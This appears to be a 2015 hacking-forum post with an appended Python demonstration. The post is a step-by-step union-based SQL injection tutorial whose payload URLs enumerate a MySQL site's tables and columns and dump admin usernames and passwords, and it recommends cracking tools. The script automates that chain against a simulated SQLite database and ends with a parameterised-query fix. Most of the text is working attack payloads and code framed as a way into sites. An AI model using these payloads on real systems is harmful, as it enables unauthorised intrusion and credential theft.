Void
03-17-2015, 12:32 PM
Mysql has 2 types only as mentioned above.you need to know the following things about the DB you are attacking-
# Number of columns
# Table names
# column names
# Let's start with the union attack, the most common; every n00b should know it :p-
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next part-
I'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't give you anything, change the first part of the query to a negative value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on your screen. In my case it is 2. Now we know that column 2 will echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get it with this, try this-
=> http://test.com/index.php?id=-1 union select 1,version(),3,4,5--
Now you will get the version name
it can be-
# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table extraction for version 5+ :
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
It'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the query will be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=>
http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It shows the column names to me. In my case they are-
# user_name
# user_password
# sex
# uid
We only need to know the username & pass, so we reject the other two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => admin:password
The password can also be encrypted. So you can use a few online decrypters or a software I know => Password Pro
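The whole procedure from the post, played out end to end as an added example (this is not code from the original post). It runs against an in-memory SQLite database that stands in for the MySQL back end, with a constructed `news` table behind `index.php?id=`, a constructed `admin` table, and a stand-in page template that assumes only the title (column 2) is rendered, matching the post. Dialect differences are marked in comments: SQLite has no `information_schema` or `@@version`, so `sqlite_master`, `pragma_table_info()` and `sqlite_version()` are used instead, and `group_concat(user_name,0x3a,user_password)` becomes `group_concat(user_name || char(58) || user_password)`. The parameterised `safe_lookup` is included beside the vulnerable one so you can see the same payload become inert.

```python
"""Union-based SQL injection, end to end, against a simulated vulnerable page.

Added example, not code from the original post. It plays out the post's
procedure (ORDER BY to count columns, UNION SELECT with id=-1 to find the
echoed column, group_concat() to enumerate tables/columns and dump the admin
row) against an in-memory SQLite database standing in for the MySQL back end.
The tables, rows and the "template" are constructed for this demo.
"""
import sqlite3

# Constructed sample schema: 'news' is the table behind index.php?id=,
# 'admin' is the target table from the post.
SAMPLE_SQL = """
CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
INSERT INTO news VALUES (1, 'Hello', 'first post', 'void', '2015-03-17');
CREATE TABLE admin (uid INTEGER, user_name TEXT, user_password TEXT, sex TEXT);
INSERT INTO admin VALUES (1, 'admin', 'password', 'm');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SQL)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mimics the vulnerable index.php: the id is pasted into the SQL text."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=" + user_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # the "page gives an error" case from the post


def safe_lookup(conn, user_id):
    """Hardened form: a bound parameter is data, never SQL, so the same
    payload is compared as one literal string and matches nothing."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def render(rows):
    """Stand-in for the page template: only the title (column 2) reaches HTML."""
    return "\n".join(str(r[1]) for r in rows) if rows else ""


def count_columns(conn, max_cols=20):
    """Step 1: ORDER BY n errors as soon as n exceeds the column count."""
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(conn, f"1 order by {n}--") is None:
            return n - 1
    return None


def find_echoed_column(conn, ncols):
    """Step 2: id=-1 empties the real result, so the UNION row is what the
    page shows; the marker that appears is the column we can read through."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = render(vulnerable_lookup(conn, f"-1 union all select {markers}--"))
    shown = page.split()
    for i in range(1, ncols + 1):
        if str(i) in shown:
            return i
    return None


def inject(conn, ncols, echo_col, expr, from_clause=""):
    """Put an expression in the echoed slot and return what the page renders."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo_col - 1] = expr
    payload = f"-1 union all select {','.join(cols)}{from_clause}--"
    return render(vulnerable_lookup(conn, payload))


def db_version(conn, ncols, echo_col):
    # MySQL: @@version or version(); SQLite equivalent: sqlite_version()
    return inject(conn, ncols, echo_col, "sqlite_version()")


def list_tables(conn, ncols, echo_col):
    # MySQL: group_concat(table_name) from information_schema.tables
    return inject(conn, ncols, echo_col, "group_concat(name)",
                  " from sqlite_master where type='table'")


def list_columns(conn, ncols, echo_col, table):
    # MySQL: information_schema.columns where table_name=CHAR(97,100,...).
    # The char() trick is kept: the table name is spelled without quotes.
    codes = ",".join(str(ord(c)) for c in table)
    return inject(conn, ncols, echo_col, "group_concat(name)",
                  f" from pragma_table_info(char({codes}))")


def dump_credentials(conn, ncols, echo_col):
    # MySQL: group_concat(user_name,0x3a,user_password) from admin.
    # SQLite's group_concat takes one expression, so concatenate with ||;
    # char(58) is ':' (the post's 0x3a).
    return inject(conn, ncols, echo_col,
                  "group_concat(user_name || char(58) || user_password)",
                  " from admin")


if __name__ == "__main__":
    db = open_db()
    n = count_columns(db)
    col = find_echoed_column(db, n)
    print("columns:", n, "echoed column:", col)
    print("version:", db_version(db, n, col))
    print("tables:", list_tables(db, n, col))
    print("admin columns:", list_columns(db, n, col, "admin"))
    print("creds:", dump_credentials(db, n, col))
    print("same payload vs. parameterised query:",
          safe_lookup(db, "-1 union all select 1,2,3,4,5--"))
```

Run it as a script to watch each step print; `count_columns` stops at the first `ORDER BY` that errors, exactly the 10/7/5 walk from the post, only automated. The `safe_lookup` call at the end returns an empty list because the placeholder binds the whole payload as a value compared against `id`; add an `int()` check on top in real code so non-numeric ids are rejected before the query is ever built.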